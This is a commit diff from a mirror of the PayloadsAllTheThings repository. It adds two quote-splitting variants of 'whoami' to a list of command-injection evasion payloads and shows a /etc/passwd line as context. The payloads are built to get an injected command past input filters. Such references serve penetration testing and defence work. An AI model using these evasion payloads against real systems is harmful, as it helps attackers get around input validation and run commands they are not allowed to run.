mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 18:36:10 +00:00
update quote evasion payloads
This commit is contained in:
parent
80707e805b
commit
77f83c18b3
@ -266,6 +266,7 @@ root:x:0:0:root:/root:/bin/bash
|
|||||||
```powershell
|
```powershell
|
||||||
w'h'o'am'i
|
w'h'o'am'i
|
||||||
wh''oami
|
wh''oami
|
||||||
|
'w'hoami
|
||||||
```
|
```
|
||||||
|
|
||||||
#### Bypass with double quote
|
#### Bypass with double quote
|
||||||
@ -273,6 +274,7 @@ wh''oami
|
|||||||
```powershell
|
```powershell
|
||||||
w"h"o"am"i
|
w"h"o"am"i
|
||||||
wh""oami
|
wh""oami
|
||||||
|
"wh"oami
|
||||||
```
|
```
|
||||||
|
|
||||||
#### Bypass with backticks
|
#### Bypass with backticks
|
||||||
|
Loading…
Reference in New Issue
Block a user